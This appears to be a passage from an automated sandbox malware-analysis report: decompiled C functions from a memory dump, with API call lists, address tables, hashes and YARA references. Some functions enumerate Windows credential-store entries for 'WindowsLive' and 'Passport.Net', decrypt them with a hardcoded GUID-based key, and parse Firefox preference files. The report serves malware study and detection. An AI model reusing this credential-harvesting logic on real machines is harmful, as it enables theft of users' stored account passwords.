					_t89 = L"WindowsLive:name=*";
				}
				_v800 = 0;
				_v796 = 0;
				if(E00404647( &_v800, _t85, _t97) == 0) {
					L21:
					return E004046C2( &_v800);
				}
				_v808 = 0;
				_v812 = 0;
				if(_v780 == 0) {
					_t57 = 0;
					__eflags = 0;
				} else {
					_t57 = _v776(_t89, 0,  &_v812,  &_v808);
				}
				if(_t57 == 0) {
					goto L21;
				} else {
					_t58 = 0;
					_v804 = 0;
					if(_v812 <= 0) {
						L20:
						_v788(_v808);
						goto L21;
					} else {
						do {
							_t92 =  *((intOrPtr*)(_v808 + _t58 * 4));
							if( *((intOrPtr*)(_t92 + 4)) == 1 &&  *(_t92 + 8) != 0 &&  *(_t92 + 0x30) != 0) {
								_v772 = 0;
								memset( &_v771, 0, 0xff);
								_t96 = _t96 + 0xc;
								if(WideCharToMultiByte(0, 0,  *(_t92 + 8), 0xffffffff,  &_v772, 0xff, 0, 0) > 0) {
									_push(0x11);
									_t65 =  &_v772;
									_push("windowslive:name=");
									_push(_t65);
									L00411612();
									_t96 = _t96 + 0xc;
									if(_t65 == 0) {
										_v516 = 0;
										_v260 = 0;
										WideCharToMultiByte(0, 0,  *(_t92 + 0x30), 0xffffffff,  &_v516, 0xff, 0, 0);
										_t68 =  *(_t92 + 0x18);
										if(_t68 > 0) {
											WideCharToMultiByte(0, 0,  *(_t92 + 0x1c), _t68 >> 1,  &_v260, 0xff, 0, 0);
											 *((char*)(_t96 + ( *(_t92 + 0x18) >> 1) + 0x238)) = 0;
										}
										if(_v260 == 0) {
											_t69 = _a4;
											_t44 = _t69 + 8;
											 *_t44 =  *((intOrPtr*)(_t69 + 8)) + 1;
											__eflags =  *_t44;
										} else {
											_t93 = _a4;
											 *((intOrPtr*)( *_t93 + 4))( &_v516);
											 *((intOrPtr*)(_t93 + 4)) =  *((intOrPtr*)(_t93 + 4)) + 1;
										}
									}
								}
							}
							_t58 = _v804 + 1;
							_v804 = _t58;
						} while (_t58 < _v812);
						goto L20;
					}
				}
			}






























                                                                        0x0040d86b
                                                                        0x0040d86e
                                                                        0x0040d878
                                                                        0x0040d879
                                                                        0x0040d87c
                                                                        0x0040d87f
                                                                        0x0040d881
                                                                        0x0040d886
                                                                        0x0040d88a
                                                                        0x0040d88c
                                                                        0x0040d88c
                                                                        0x0040d895
                                                                        0x0040d899
                                                                        0x0040d8a4
                                                                        0x0040d9e7
                                                                        0x0040d9f6
                                                                        0x0040d9f6
                                                                        0x0040d8ae
                                                                        0x0040d8b2
                                                                        0x0040d8b6
                                                                        0x0040d8ca
                                                                        0x0040d8ca
                                                                        0x0040d8b8
                                                                        0x0040d8c4
                                                                        0x0040d8c4
                                                                        0x0040d8ce
                                                                        0x00000000
                                                                        0x0040d8d4
                                                                        0x0040d8d4
                                                                        0x0040d8da
                                                                        0x0040d8de
                                                                        0x0040d9df
                                                                        0x0040d9e3
                                                                        0x00000000
                                                                        0x0040d8e4
                                                                        0x0040d8e9
                                                                        0x0040d8ed
                                                                        0x0040d8f4
                                                                        0x0040d913
                                                                        0x0040d917
                                                                        0x0040d91c
                                                                        0x0040d936
                                                                        0x0040d93c
                                                                        0x0040d93e
                                                                        0x0040d942
                                                                        0x0040d947
                                                                        0x0040d948
                                                                        0x0040d94d
                                                                        0x0040d952
                                                                        0x0040d964
                                                                        0x0040d96d
                                                                        0x0040d974
                                                                        0x0040d97a
                                                                        0x0040d97f
                                                                        0x0040d994
                                                                        0x0040d99f
                                                                        0x0040d99f
                                                                        0x0040d9ad
                                                                        0x0040d9c6
                                                                        0x0040d9c9
                                                                        0x0040d9c9
                                                                        0x0040d9c9
                                                                        0x0040d9af
                                                                        0x0040d9af
                                                                        0x0040d9be
                                                                        0x0040d9c1
                                                                        0x0040d9c1
                                                                        0x0040d9ad
                                                                        0x0040d952
                                                                        0x0040d936
                                                                        0x0040d9d0
                                                                        0x0040d9d5
                                                                        0x0040d9d5
                                                                        0x00000000
                                                                        0x0040d8e9
                                                                        0x0040d8de

                                                                        APIs
                                                                          • Part of subcall function 00406278: GetVersionExA.KERNEL32(00417118,0000001A,0040EE77,00000104), ref: 00406292
                                                                        • memset.MSVCRT ref: 0040D917
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040D92E
                                                                        • _strnicmp.MSVCRT ref: 0040D948
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040D974
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040D994
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                                                        • String ID: WindowsLive:name=*$windowslive:name=
                                                                        • API String ID: 945165440-3589380929
                                                                        • Opcode ID: 3f9da4edc47d2955fd47475458a514ae76322f65be24e3d720485981fdfd18bc
                                                                        • Instruction ID: 27d6d704735a973bd95cec350459a8e2137e61d4893fa240fc9d50cc053063f8
                                                                        • Opcode Fuzzy Hash: 3f9da4edc47d2955fd47475458a514ae76322f65be24e3d720485981fdfd18bc
                                                                        • Instruction Fuzzy Hash: FD4183B1904345AFC720EF54D9849ABBBECEB84344F044A3EF995A3291D734DD48CB66
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00405960, Relevance: 12.1, APIs: 8, Instructions: 103windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 85%
                                                                        			E00405960(void** __eax, void* __edi, intOrPtr _a4, struct HWND__* _a8) {
				RECT* _v8;
				void* __esi;
				void* _t39;
				signed int _t41;
				void* _t42;
				struct HWND__* _t47;
				signed int _t53;
				void* _t54;
				signed int _t76;
				signed int _t78;
				void* _t80;
				void** _t82;
				signed int _t86;
				void* _t90;
				signed int _t91;

				_t80 = __edi;
				_push(_t58);
				_push(0xc);
				_v8 = 0;
				 *((intOrPtr*)(__edi + 0x10)) = __eax;
				L004115D0();
				if(__eax == 0) {
					_t82 = 0;
				} else {
					 *((intOrPtr*)(__eax)) = 0;
					_t82 = __eax;
				}
				 *(_t80 + 0xc) = _t82;
				_t39 =  *_t82;
				_t90 = _t39;
				if(_t90 != 0) {
					_push(_t39);
					L004115D6();
					 *_t82 = 0;
				}
				_t82[2] = _a8;
				_t41 = E004049FB(_a8);
				_t76 = 4;
				_t82[1] = _t41;
				_t42 = _t41 * _t76;
				_push( ~(0 | _t90 > 0x00000000) | _t42);
				L004115D0();
				 *_t82 = _t42;
				memset(_t42, 0, _t82[1] << 2);
				E00408441( *(_t80 + 0xc), ( *(_t80 + 0xc))[2]);
				_t91 =  *(_t80 + 0x10);
				if(_t91 == 0) {
					_t86 = ( *(_t80 + 0xc))[1];
					_t78 = 0x14;
					_t53 = _t86 * _t78;
					_push( ~(0 | _t91 > 0x00000000) | _t53);
					L004115D0();
					 *(_t80 + 0x10) = _t53;
					if(_t86 > 0) {
						_t54 = 0;
						do {
							 *((intOrPtr*)(_t54 +  *(_t80 + 0x10) + 0xc)) = 0x78;
							_t54 = _t54 + 0x14;
							_t86 = _t86 - 1;
						} while (_t86 != 0);
					}
					_v8 = 1;
				}
				if(E00401540(0x448, _t80, _a4) == 1) {
					E004083B1( *(_t80 + 0xc), ( *(_t80 + 0xc))[2]);
					InvalidateRect(( *(_t80 + 0xc))[2], 0, 0);
				}
				_t47 = SetFocus(_a8);
				if(_v8 != 0) {
					_push( *(_t80 + 0x10));
					L004115D6();
				}
				return _t47;
			}


















                                                                        0x00405960
                                                                        0x00405964
                                                                        0x00405969
                                                                        0x0040596b
                                                                        0x0040596e
                                                                        0x00405971
                                                                        0x00405979
                                                                        0x00405981
                                                                        0x0040597b
                                                                        0x0040597b
                                                                        0x0040597d
                                                                        0x0040597d
                                                                        0x00405983
                                                                        0x00405986
                                                                        0x00405988
                                                                        0x0040598a
                                                                        0x0040598c
                                                                        0x0040598d
                                                                        0x00405993
                                                                        0x00405993
                                                                        0x00405999
                                                                        0x0040599c
                                                                        0x004059a6
                                                                        0x004059a7
                                                                        0x004059aa
                                                                        0x004059b3
                                                                        0x004059b4
                                                                        0x004059c3
                                                                        0x004059c5
                                                                        0x004059d3
                                                                        0x004059d8
                                                                        0x004059db
                                                                        0x004059e0
                                                                        0x004059e7
                                                                        0x004059ea
                                                                        0x004059f3
                                                                        0x004059f4
                                                                        0x004059fc
                                                                        0x004059ff
                                                                        0x00405a01
                                                                        0x00405a03
                                                                        0x00405a06
                                                                        0x00405a0e
                                                                        0x00405a11
                                                                        0x00405a11
                                                                        0x00405a03
                                                                        0x00405a14
                                                                        0x00405a14
                                                                        0x00405a2c
                                                                        0x00405a34
                                                                        0x00405a41
                                                                        0x00405a41
                                                                        0x00405a4a
                                                                        0x00405a53
                                                                        0x00405a55
                                                                        0x00405a58
                                                                        0x00405a5d
                                                                        0x00405a61

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                        • String ID:
                                                                        • API String ID: 2313361498-0
                                                                        • Opcode ID: e9f0ab907bec5e8f57c7acbac99c3809d1984f2ed9ff4bf297ffd43cd07246d7
                                                                        • Instruction ID: c71b172428599a8aed3dd41af9edf36fe528ac6939486576e3287dd5c50b91d7
                                                                        • Opcode Fuzzy Hash: e9f0ab907bec5e8f57c7acbac99c3809d1984f2ed9ff4bf297ffd43cd07246d7
                                                                        • Instruction Fuzzy Hash: 9931C6B2600605BFDB149F29D88591AF7A5FF44354B10863FF54AE72A0DB78EC408F98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040A698, Relevance: 12.1, APIs: 8, Instructions: 76COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0040A698(void* __esi) {
				struct HDWP__* _v8;
				int _v12;
				intOrPtr _v16;
				struct tagRECT _v32;
				struct tagRECT _v48;
				void* _t32;
				int _t60;
				int _t65;

				if( *((intOrPtr*)(__esi + 0x124)) != 0) {
					GetClientRect( *(__esi + 0x108),  &_v32);
					GetWindowRect( *(__esi + 0x114),  &_v48);
					_t65 = _v48.bottom - _v48.top + 1;
					GetWindowRect( *(__esi + 0x118),  &_v48);
					_v12 = _v32.right - _v32.left;
					_t60 = _v48.bottom - _v48.top + 1;
					_v16 = _v32.bottom - _v32.top;
					_v8 = BeginDeferWindowPos(3);
					DeferWindowPos(_v8,  *(__esi + 0x118), 0, 0, 0, _v12, _t60, 4);
					DeferWindowPos(_v8,  *(__esi + 0x114), 0, 0, _v32.bottom - _t65 + 1, _v12, _t65, 6);
					DeferWindowPos(_v8,  *( *((intOrPtr*)(__esi + 0x370)) + 0x184), 0, 0, _t60, _v12, _v16 - _t60 - _t65, 4);
					return EndDeferWindowPos(_v8);
				}
				return _t32;
			}











                                                                        0x0040a6a5
                                                                        0x0040a6b7
                                                                        0x0040a6cd
                                                                        0x0040a6df
                                                                        0x0040a6e0
                                                                        0x0040a6ee
                                                                        0x0040a6f9
                                                                        0x0040a6fa
                                                                        0x0040a709
                                                                        0x0040a71a
                                                                        0x0040a73a
                                                                        0x0040a761
                                                                        0x00000000
                                                                        0x0040a771
                                                                        0x0040a773

                                                                        APIs
                                                                        • GetClientRect.USER32 ref: 0040A6B7
                                                                        • GetWindowRect.USER32 ref: 0040A6CD
                                                                        • GetWindowRect.USER32 ref: 0040A6E0
                                                                        • BeginDeferWindowPos.USER32 ref: 0040A6FD
                                                                        • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040A71A
                                                                        • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040A73A
                                                                        • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040A761
                                                                        • EndDeferWindowPos.USER32(?), ref: 0040A76A
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Window$Defer$Rect$BeginClient
                                                                        • String ID:
                                                                        • API String ID: 2126104762-0
                                                                        • Opcode ID: 7346dcf7e22bd518b4d0e96dfafb7fac3e60ecb16f258d456982d784f7109538
                                                                        • Instruction ID: 87e3885615821b4149b7d1c90d618f2f4546f2004ccbdac015d6c62594ca92fd
                                                                        • Opcode Fuzzy Hash: 7346dcf7e22bd518b4d0e96dfafb7fac3e60ecb16f258d456982d784f7109538
                                                                        • Instruction Fuzzy Hash: 1E21A771A00209FFDB11CFA8DE89FEEBBB9FB08710F104465F655E2160C771AA519B24
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00406069, Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemorystringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 91%
                                                                        			E00406069(void* _a4) {
				signed int _t11;
				int _t13;
				void* _t17;
				signed int _t19;
				void* _t22;

				_t22 = _a4;
				_t19 = 0;
				EmptyClipboard();
				if(_t22 != 0) {
					_t2 = strlen(_t22) + 1; // 0x1
					_t13 = _t2;
					_t17 = GlobalAlloc(0x2000, _t13);
					if(_t17 != 0) {
						memcpy(GlobalLock(_t17), _t22, _t13);
						GlobalUnlock(_t17);
						_t11 = SetClipboardData(1, _t17);
						asm("sbb esi, esi");
						_t19 =  ~( ~_t11);
					}
				}
				CloseClipboard();
				return _t19;
			}








                                                                        0x0040606a
                                                                        0x0040606f
                                                                        0x00406071
                                                                        0x00406079
                                                                        0x00406084
                                                                        0x00406084
                                                                        0x00406093
                                                                        0x00406097
                                                                        0x004060a3
                                                                        0x004060ac
                                                                        0x004060b5
                                                                        0x004060bf
                                                                        0x004060c1
                                                                        0x004060c1
                                                                        0x004060c4
                                                                        0x004060c5
                                                                        0x004060cf

                                                                        APIs
                                                                        • EmptyClipboard.USER32(?,?,0040AEA7,?), ref: 00406071
                                                                        • strlen.MSVCRT ref: 0040607E
                                                                        • GlobalAlloc.KERNEL32(00002000,00000001,?,?,?,?,0040AEA7,?), ref: 0040608D
                                                                        • GlobalLock.KERNEL32 ref: 0040609A
                                                                        • memcpy.MSVCRT ref: 004060A3
                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 004060AC
                                                                        • SetClipboardData.USER32(00000001,00000000), ref: 004060B5
                                                                        • CloseClipboard.USER32(?,?,0040AEA7,?), ref: 004060C5
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpystrlen
                                                                        • String ID:
                                                                        • API String ID: 3116012682-0
                                                                        • Opcode ID: e5bd8c8a43ca7d2c4db01fa4e1da57243b9996234b951f9bb1286513fb8d9efd
                                                                        • Instruction ID: 7816216ade6a299d8ea944e6e9fe2aa84d769726faeb140b6a28ec5125b6acba
                                                                        • Opcode Fuzzy Hash: e5bd8c8a43ca7d2c4db01fa4e1da57243b9996234b951f9bb1286513fb8d9efd
                                                                        • Instruction Fuzzy Hash: 0DF0B4375402296BC3102BA0AD4CEDB7B6CEBC8B557028139FB0AD3151EA78592487B9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040C530, Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 145COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 80%
                                                                        			E0040C530(void* __eflags, intOrPtr* _a4) {
				int _v8;
				char _v12;
				intOrPtr _v16;
				void _v1029;
				void _v1039;
				char _v1040;
				void _v2063;
				void _v2064;
				void _v3087;
				void _v3088;
				void* __ebx;
				intOrPtr _t53;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t67;
				void* _t68;
				void* _t73;
				void* _t85;
				int _t86;
				void* _t106;
				int _t107;
				int _t111;
				void* _t114;
				void* _t115;
				void* _t116;

				_v1040 = 0;
				memset( &_v1039, 0, 0x3ff);
				_v3088 = 0;
				memset( &_v3087, 0, 0x3ff);
				_v2064 = 0;
				memset( &_v2063, 0, 0x3ff);
				_t116 = _t115 + 0x24;
				_t53 = E00406B74(_a4 + 4);
				_v12 = 0;
				_v16 = _t53;
				_t54 = E00406900(_t53,  &_v1040,  &_v1040,  &_v12);
				if(_t54 != 0) {
					do {
						_t56 = E004069D2(0, "user_pref(\"");
						_pop(_t92);
						if(_t56 != 0) {
							goto L10;
						}
						_push(0x412b10);
						_t60 = 0xb;
						_t14 = E004069D2(_t60) - 0xb; // -11
						_t92 = _t14;
						_v8 = _t92;
						if(_t92 <= 0) {
							goto L10;
						}
						_t85 = E004069D2(_t61 + 1, 0x412b18);
						_t17 = _t85 + 1; // 0x1
						_t106 = E004069D2(_t17, 0x412b10);
						if(_t106 <= 0) {
							_t28 = _t85 + 1; // 0x1
							_t67 = E004069D2(_t28, ")");
							_pop(_t92);
							_t68 = 0xfffffffe;
							_t111 = _t67 + _t68 - _t85;
							if(_t111 <= 0) {
								goto L10;
							}
							_t107 = _v8;
							memcpy( &_v3088,  &_v1029, _t107);
							 *((char*)(_t114 + _t107 - 0xc0c)) = 0;
							_t73 = _t114 + _t85 - 0x40a;
							L9:
							memcpy( &_v2064, _t73, _t111);
							_t92 = _a4;
							_t116 = _t116 + 0x18;
							 *((char*)(_t114 + _t111 - 0x80c)) = 0;
							_t59 =  *((intOrPtr*)( *_a4))( &_v3088,  &_v2064);
							if(_t59 == 0) {
								break;
							}
							goto L10;
						}
						_t20 = _t106 + 1; // 0x1
						_t111 = E004069D2(_t20, 0x412b10) - _t106 - 1;
						_pop(_t92);
						if(_t111 <= 0) {
							goto L10;
						}
						_t86 = _v8;
						memcpy( &_v3088,  &_v1029, _t86);
						 *((char*)(_t114 + _t86 - 0xc0c)) = 0;
						_t73 = _t114 + _t106 - 0x40b;
						goto L9;
						L10:
						_t59 = E00406900(_v16, _t92,  &_v1040,  &_v12);
					} while (_t59 != 0);
					return _t59;
				}
				return _t54;
			}






























                                                                        0x0040c54b
                                                                        0x0040c551
                                                                        0x0040c55f
                                                                        0x0040c565
                                                                        0x0040c573
                                                                        0x0040c579
                                                                        0x0040c581
                                                                        0x0040c587
                                                                        0x0040c596
                                                                        0x0040c59c
                                                                        0x0040c59f
                                                                        0x0040c5a8
                                                                        0x0040c5af
                                                                        0x0040c5bc
                                                                        0x0040c5c3
                                                                        0x0040c5c4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040c5cf
                                                                        0x0040c5d2
                                                                        0x0040c5df
                                                                        0x0040c5df
                                                                        0x0040c5e4
                                                                        0x0040c5e7
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040c5fe
                                                                        0x0040c600
                                                                        0x0040c610
                                                                        0x0040c61b
                                                                        0x0040c661
                                                                        0x0040c664
                                                                        0x0040c669
                                                                        0x0040c66e
                                                                        0x0040c671
                                                                        0x0040c675
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040c677
                                                                        0x0040c689
                                                                        0x0040c68e
                                                                        0x0040c696
                                                                        0x0040c69d
                                                                        0x0040c6a6
                                                                        0x0040c6ab
                                                                        0x0040c6b0
                                                                        0x0040c6c1
                                                                        0x0040c6c9
                                                                        0x0040c6cd
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040c6cd
                                                                        0x0040c61d
                                                                        0x0040c62a
                                                                        0x0040c62d
                                                                        0x0040c62e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040c634
                                                                        0x0040c646
                                                                        0x0040c64b
                                                                        0x0040c653
                                                                        0x00000000
                                                                        0x0040c6cf
                                                                        0x0040c6dd
                                                                        0x0040c6e5
                                                                        0x00000000
                                                                        0x0040c6ec
                                                                        0x0040c6f0

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: memcpymemset$strlen$_memicmp
                                                                        • String ID: user_pref("
                                                                        • API String ID: 765841271-2487180061
                                                                        • Opcode ID: 982af1ce4df36f9e7f27790100b248c040b5dee6bd91ee0204a86cb4ecdb3b86
                                                                        • Instruction ID: b5bbfaa39c0e48752cfa6ff41fc25d90fc637c7d31dd27b270ce5155e9a91379
                                                                        • Opcode Fuzzy Hash: 982af1ce4df36f9e7f27790100b248c040b5dee6bd91ee0204a86cb4ecdb3b86
                                                                        • Instruction Fuzzy Hash: A74168B2904118AADB10DB95DCC0EDA77AD9F44314F1046BBE605F7181EA389F49CFA8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040559F, Relevance: 10.6, APIs: 7, Instructions: 126windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 61%
                                                                        			E0040559F(intOrPtr _a4) {
				struct HWND__* _v12;
				signed int _v16;
				int _v20;
				int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				int _v48;
				char* _v52;
				void* _v64;
				void _v319;
				char _v320;
				struct HWND__* _t53;
				intOrPtr* _t59;
				void* _t61;
				intOrPtr _t66;
				void* _t74;
				void* _t80;
				intOrPtr _t81;
				void* _t84;
				intOrPtr _t89;
				short _t91;
				signed int _t94;
				short* _t95;
				void* _t96;
				void* _t97;

				_t89 = _a4;
				_t53 = GetDlgItem( *(_t89 + 4), 0x3e9);
				_v12 = _t53;
				SendMessageA(_t53, 0x1009, 0, 0);
				SendMessageA(_v12, 0x1036, 0, 0x26);
				do {
				} while (SendMessageA(_v12, 0x101c, 0, 0) != 0);
				_push(0xc8);
				_push(0);
				_push(0);
				_push(_v12);
				_t80 = 6;
				E00404925(0x412466, _t80);
				_t59 =  *((intOrPtr*)(_t89 + 0xc));
				_t81 =  *((intOrPtr*)(_t59 + 4));
				_t97 = _t96 + 0x10;
				_v32 = _t81;
				_v28 =  *_t59;
				_v20 = 0;
				if(_t81 <= 0) {
					L10:
					_t61 = 2;
					E004048B6(_t61, _v12, 0, _t61);
					return SetFocus(_v12);
				} else {
					goto L3;
				}
				do {
					L3:
					_v16 = 0;
					_v24 = 0;
					do {
						_t94 = _v16 << 2;
						if( *((short*)(_v28 + _t94 + 2)) == _v20) {
							_v320 = 0;
							memset( &_v319, 0, 0xff);
							_t97 = _t97 + 0xc;
							_v52 =  &_v320;
							_v64 = 4;
							_v48 = 0xff;
							if(SendMessageA( *( *((intOrPtr*)(_a4 + 0xc)) + 8), 0x1019, _v16,  &_v64) != 0) {
								_push(_v16);
								_push(0);
								_push(_v12);
								_t84 = 5;
								_t74 = E0040496E( &_v320, _t84);
								_t95 = _t94 + _v28;
								_t91 =  *_t95;
								E00404CE9(_v12, _t74, 0 | _t91 > 0x00000000);
								_t97 = _t97 + 0x18;
								if(_t91 == 0) {
									 *_t95 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x10)) + _v24 + 0xc));
								}
							}
						}
						_v16 = _v16 + 1;
						_t66 = _v32;
						_v24 = _v24 + 0x14;
					} while (_v16 < _t66);
					_v20 = _v20 + 1;
				} while (_v20 < _t66);
				goto L10;
			}




























                                                                        0x004055ab
                                                                        0x004055b6
                                                                        0x004055cc
                                                                        0x004055cf
                                                                        0x004055dc
                                                                        0x004055de
                                                                        0x004055ea
                                                                        0x004055ee
                                                                        0x004055f3
                                                                        0x004055f4
                                                                        0x004055f5
                                                                        0x004055ff
                                                                        0x00405600
                                                                        0x00405605
                                                                        0x00405608
                                                                        0x0040560d
                                                                        0x00405612
                                                                        0x00405615
                                                                        0x00405618
                                                                        0x0040561b
                                                                        0x004056f5
                                                                        0x004056f7
                                                                        0x004056fd
                                                                        0x00405712
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00405621
                                                                        0x00405621
                                                                        0x00405621
                                                                        0x00405624
                                                                        0x00405627
                                                                        0x0040562d
                                                                        0x00405638
                                                                        0x0040564c
                                                                        0x00405652
                                                                        0x00405660
                                                                        0x00405669
                                                                        0x00405673
                                                                        0x00405680
                                                                        0x0040568b
                                                                        0x0040568d
                                                                        0x00405696
                                                                        0x00405697
                                                                        0x0040569c
                                                                        0x0040569d
                                                                        0x004056a5
                                                                        0x004056a7
                                                                        0x004056b9
                                                                        0x004056be
                                                                        0x004056c3
                                                                        0x004056d3
                                                                        0x004056d3
                                                                        0x004056c3
                                                                        0x0040568b
                                                                        0x004056d6
                                                                        0x004056d9
                                                                        0x004056dc
                                                                        0x004056e0
                                                                        0x004056e9
                                                                        0x004056ec
                                                                        0x00000000

                                                                        APIs
                                                                        • GetDlgItem.USER32 ref: 004055B6
                                                                        • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 004055CF
                                                                        • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 004055DC
                                                                        • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 004055E8
                                                                        • memset.MSVCRT ref: 00405652
                                                                        • SendMessageA.USER32(?,00001019,?,?), ref: 00405683
                                                                        • SetFocus.USER32(?), ref: 00405708
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: MessageSend$FocusItemmemset
                                                                        • String ID:
                                                                        • API String ID: 4281309102-0
                                                                        • Opcode ID: 373d2b268ded57f609baf290f43656ad992e230c838bd3448275ee254fe81e2e
                                                                        • Instruction ID: c9ec69d2b7f122f2474fbd4df523f5fea2365e5f162f49a3354b930d279265bd
                                                                        • Opcode Fuzzy Hash: 373d2b268ded57f609baf290f43656ad992e230c838bd3448275ee254fe81e2e
                                                                        • Instruction Fuzzy Hash: 304126B5D00109AFDB209F99DC81DAEBBB9FF04348F00846AE918B7291D7759E50CFA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040D5DB, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 97stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 64%
                                                                        			E0040D5DB(char* __ebx, void* __eflags) {
				char _v8;
				short* _v12;
				int _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v48;
				intOrPtr _v52;
				int _v56;
				char _v60;
				char _v584;
				void* __edi;
				void* __esi;
				void* _t36;
				intOrPtr _t44;
				void* _t47;
				char _t63;
				int _t69;
				void* _t74;

				_t74 = __eflags;
				_t69 = 0;
				E004046D7( &_v584);
				_v60 = 0;
				_v56 = 0;
				_t36 = E00404647( &_v60, 0, _t74);
				_t75 = _t36;
				if(_t36 != 0 && E004047A0( &_v584, _t75) != 0) {
					_push( &_v8);
					_push(0);
					_push(4);
					_push("Passport.Net\\*");
					if(_v52() != 0) {
						_t44 = _v8;
						if( *((intOrPtr*)(_t44 + 0x30)) != 0 &&  *((intOrPtr*)(_t44 + 0x18)) > 0) {
							_v32 =  *((intOrPtr*)(_t44 + 0x18));
							_v28 =  *((intOrPtr*)(_t44 + 0x1c));
							_t47 = 0;
							_t63 = 0x4a;
							do {
								_t14 = _t47 + L"82BD0E67-9FEA-4748-8672-D5EFE5B779B0"; // 0x320038
								 *(_t47 + 0x417768) =  *_t14 << 2;
								_t47 = _t47 + 2;
							} while (_t47 < _t63);
							_v24 = _t63;
							_v20 = 0x417768;
							if(E00404811( &_v584,  &_v32,  &_v24,  &_v16) != 0) {
								if(WideCharToMultiByte(0, 0, _v12, _v16,  &(__ebx[0x100]), 0xff, 0, 0) > 0 && strlen( *(_v8 + 0x30)) < 0xff) {
									strcpy(__ebx,  *(_v8 + 0x30));
									_t69 = 1;
								}
								LocalFree(_v12);
							}
							_t44 = _v8;
						}
						_v48(_t44);
					}
				}
				E004046C2( &_v60);
				E004047F1( &_v584);
				return _t69;
			}























                                                                        0x0040d5db
                                                                        0x0040d5ec
                                                                        0x0040d5ee
                                                                        0x0040d5f6
                                                                        0x0040d5f9
                                                                        0x0040d5fc
                                                                        0x0040d601
                                                                        0x0040d603
                                                                        0x0040d619
                                                                        0x0040d61a
                                                                        0x0040d61b
                                                                        0x0040d61d
                                                                        0x0040d627
                                                                        0x0040d62d
                                                                        0x0040d633
                                                                        0x0040d645
                                                                        0x0040d64d
                                                                        0x0040d650
                                                                        0x0040d652
                                                                        0x0040d653
                                                                        0x0040d653
                                                                        0x0040d65e
                                                                        0x0040d666
                                                                        0x0040d667
                                                                        0x0040d67d
                                                                        0x0040d680
                                                                        0x0040d68e
                                                                        0x0040d6af
                                                                        0x0040d6c8
                                                                        0x0040d6d1
                                                                        0x0040d6d1
                                                                        0x0040d6d5
                                                                        0x0040d6d5
                                                                        0x0040d6db
                                                                        0x0040d6db
